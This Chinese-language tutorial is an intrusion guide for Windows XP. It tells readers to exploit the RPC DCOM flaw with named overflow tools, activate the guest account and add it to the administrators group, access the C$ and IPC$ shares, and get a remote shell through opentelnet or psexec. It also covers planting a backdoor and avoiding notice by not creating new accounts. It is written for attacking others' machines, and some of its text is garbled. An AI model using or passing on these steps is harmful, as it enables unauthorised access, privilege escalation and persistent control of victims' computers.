入侵xp系統(tǒng)之初步攻略

字號:

1.思路:突破xp系統(tǒng)遠(yuǎn)程訪問的限制,實現(xiàn)文件傳輸和遠(yuǎn)程登陸。
    2.工具:rpc漏洞掃描工具、溢出工具,pstools工具包。
    3.步驟
    1)步驟一:rpc漏洞掃描:
    推薦使用retinarpcdcom.exe
    圖形界面,在劍鷹網(wǎng)絡(luò)安全小組有下載。
    2)步驟二:遠(yuǎn)程溢出:
    在劍鷹網(wǎng)絡(luò)安全小組有很多該類工具下載,我用xp.exe,溢出成功率極高。
    3)步驟三:提升guest權(quán)限(本方案之關(guān)鍵):
    命令:net user guest /active:yes
    net localgroup aministrators guest /add
    ——————————————————————————————
    看到這里,也許你會嗤之以鼻,
    可這正是大家忽略的地方,因為guest有與其它所有帳號不同的特性。
    如果你用net user guest命令,將會看到下面的內(nèi)容:
    Password required No
    這正是突破xp系統(tǒng)遠(yuǎn)程訪問帳號限制的突破口!
    除了guest外,其它帳號都是
    Password required yes
    所以就算你有xp系統(tǒng)的管理員帳號密碼一樣無所作為。
    ——————————————————————————————
    當(dāng)guest提升為admin權(quán)限后,你試試
    dir \\IP\c$Content$nbsp;
    現(xiàn)在你已經(jīng)有了讀寫權(quán)限,連ipc$連接都省了~~
    當(dāng)然你也一樣可以用net use \\ip "" /user:"guest"來進(jìn)行IPC$連接。
    到此,文件傳輸?shù)膯栴}已經(jīng)解決!
    4)步驟四:遠(yuǎn)程登陸
    我們當(dāng)然不想每次用溢出登陸對方。
    那么就試試opentelnet吧
    >opentelnet \\ip guest "" 1 90
    read ntlm failed \\shit!用administrator也是這樣子。
    上傳srv.exe試試,我沒試過,有興趣的自己試試。
    因為我認(rèn)為用psexec方便多了。命令如下:
    psexec \\ip cmd
    5)關(guān)于后門:
    各顯神通,我正好用來試試榕哥的bits.dll,感覺一點都不好。
    6)注意事項:
    千萬別在xp系統(tǒng)中建新帳戶(為什么?自己想想)
    xp系統(tǒng)默認(rèn)只能登陸一個帳戶,故用3389的遠(yuǎn)程登陸是不行的。
    rpc溢出會導(dǎo)致對方重啟,要慎用,尤其是服務(wù)器。